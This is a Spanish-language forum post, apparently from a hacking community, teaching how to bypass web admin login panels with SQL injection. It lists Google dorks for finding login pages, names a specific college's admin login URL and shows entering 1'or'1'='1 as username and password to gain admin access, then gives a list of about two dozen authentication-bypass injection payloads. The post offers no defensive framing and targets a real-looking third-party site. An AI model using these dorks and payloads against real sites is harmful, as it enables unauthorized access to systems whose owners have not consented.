Bypass Admin Panel




Bueno en el siguiente post, veremos como bypasear un Login Panel, con una simple consulta SQL, la cual omitirá la necesidad de contar con un nombre de usuario admin y la contraseña para entrar en el panel.
Empezaremos con unas cuantas DORKS para conseguir un par de Admin Panels;


Dork

Código:
inurl:adminlogin.aspx   inurl:admin/index.php  inurl:administrator.php  inurl:administrator.asp  inurl:login.asp  inurl:login.aspx   inurl:login.php   inurl:admin/index.php  inurl:adminlogin.aspx

Y una consulta por ejemplo al Siguiente sitio web que obtuve con la Dork:
http://satyamcolleges.com/Webadmin/AdminLogin.aspx
User: 1'or'1'='1
Password: 1'or'1'='1



y listo, acceso al area de administracion
Aqui otro tipo de consultas.


‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”).